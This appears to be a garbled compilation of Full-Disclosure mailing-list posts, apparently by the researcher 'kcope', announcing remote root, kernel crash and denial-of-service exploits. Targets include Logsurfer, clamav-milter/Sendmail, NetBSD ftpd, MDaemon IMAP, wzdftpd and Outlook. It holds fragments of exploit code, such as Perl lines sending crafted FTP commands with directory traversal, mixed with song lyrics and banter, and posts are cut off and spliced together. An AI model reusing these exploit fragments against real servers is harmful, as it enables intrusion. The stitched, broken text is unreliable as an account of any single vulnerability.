##Logsurfer default recommendation / configuration Remote Code Execution /
Injection
##discovered by kcope when securing a box
The Logsurfer program distributed by DFN CERT at
http://www.dfn-cert.de/eng/logsurf/
has a ridiculous remote code execution bug in one of its mailing scripts when
(see attached)
- -kcope
/*
SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope
Null Pointer Dereference in Kernel Space
Seems to work only if attacked
They got into the town, the enemies,
they crushed the doors, the enemies,
and we laughed in the neighborhoods,
in the first day,
They got into the town, the enemies,
they took brothers, the enemies,
and we looked at the ladies,
the next day,
They got into the town, the enemies,
they burned us, the
You don't believe in TESO!
GO EXPLOIT BIND #!+$# AS A PIONEER!
Merry Christmas,
kcdarookie
___
Full-Disclosure -
well,
clamav-milter prior to 0.91.2 //CVE-2007-4560
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
use IO::Socket;
print Sendmail w/ clamav-milter Remote Root Exploit\n;
print Copyright
/tmp/testXXX
signed,
- -kcope/2007
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full
Look, this also seems to work on sendmail. Not verified though.
exploiting features
(see attached)
- -kcope / 2007
#!python
# (C) 2007 kcope production
from ftplib import FTP
import sys
import socket
print Sendmail/Postfix FORWARD Remote
(see attached)
Mikis Theodorakis Grigoris Bithikotsis//Tis Dikaiosynis ilie noite:
http://kypros.org/Occupied_Cyprus/epiktitos/audio/patriotic/THEODORAKIS%20%20BITHIKOTSIS%20-%20Tis%20Dikaiosynis%20Ilie%20Noite.mp3
(see attached)
signed,
eliteb0y/2007
Alla pisteua gia sena,
Alla phantasomouna,
Nomisa pos magapouses,
Kai geliomouna.
Alla pisteua gia sena,
Alla phantasomouna,
Nomisa pos magapouses,
Kai geliomouna.
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf
http://www.com-winner.com/Alla_pisteua.mp3
Hello this is kingcope,
attached is an example exploit
ftpd-ldpreload.pl
Description: Binary data
USER kcope\r\n;
print $sock PASS remoteroot\r\n;
$x = stdin;
print $sock MKD $a\r\n;
print $sock NLST C*/../C*/../C*/../$d\r\n;
print $sock QUIT\r\n;
while ($sock) {
print;
}
---snip---
gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
(gdb) c
Continuing.
Program received
edit of the xls file.
Best Regards,
kcope
FistFuXXer wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello kcope,
the vulnerability that you've found isn't an Unicode-based buffer
overflow, Spreadsheet-Perl just converts the string to Unicode and you
can edit it later with a hex editor
Hello this is kcope,
recently I thought I had discovered a remote preauth vulnerability in
MDaemon latest version (9.0.1/9.0.2).
And it really looked like one in the debugger (OllyDbg) .. so I posted
it to full disclosure.
Afterwards I tried to write an exploit, and yes I succeeded
Hi Solo,
The server is not going to crash, you have to attach a debugger like
ollydbg and see what happens,
it reaches the 4 byte overwrite.
Best regards,
kcope
. Solo wrote:
Hi, kcope
I test your poc, the server of MDaemon did not crash.
The server send the [RST] to the client to reset
MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*
zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone
Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered
Shouts to blackzero, alex, wY!, revoguard, bogus, wtfomg and all those
yankees
LOVE TO LISA :-)
genuine advisory by kcope/zeroday discovered by kcope!!! kingcope[at]gmx.net
public disclosure 21. May 2006
vendor was not notified (mail quota exceeded) fuck it
let's get to business
: packet_disconnect(const char *fmt, ...)
code: packet_disconnect(msg);
i guess that's not exploitable since msg is not user supplied.
any pointers from the list?
- - kcope
hello this is kcope,
i got juarez for you..
lnxFTPDssl_warez.c is a remote r00t exploit
for the latest version of linux-ftpd-ssl.
have fun and send me feedback to kingcope[at]gmx.net
-kc
/*Oct2005 VER2
lol, yeah you're missing something :-)
just give a try on some real box...
best regards,
kcope
Harry Hoffman wrote:
Umm, am I missing something here? It looks like you need to be root to
run this program?
In the fbsd one you are trying to write to /etc which has perms:
drwxr-xr-x 17 root
hello this is kcope,
here's my simple wzdftpd exploit (0day) attached...
wzdftpdwarez.pl
Description: Perl program
hehelol :-)
imail.pl
Description: Perl program
Hello this is kcope,
there are two remote vulnerabilities in the latest ALT-N MDaemon imapd
product
i don't know if any of them is exploitable .. the stack based buffer
overflow
seems promising, but it's not preauth so i didn't investigate it further.
1.) Remote denial of service
hello, this is kcope and i'm bored .. soo
sending an email with an attachment named aux to a Microsoft Outlook
client crashes Outlook, can someone confirm that?
here's some code to test that
-snip--
use Net::SMTP_auth;
$smtp = Net::SMTP_auth->new('mail.gmx.net');
$smtp->auth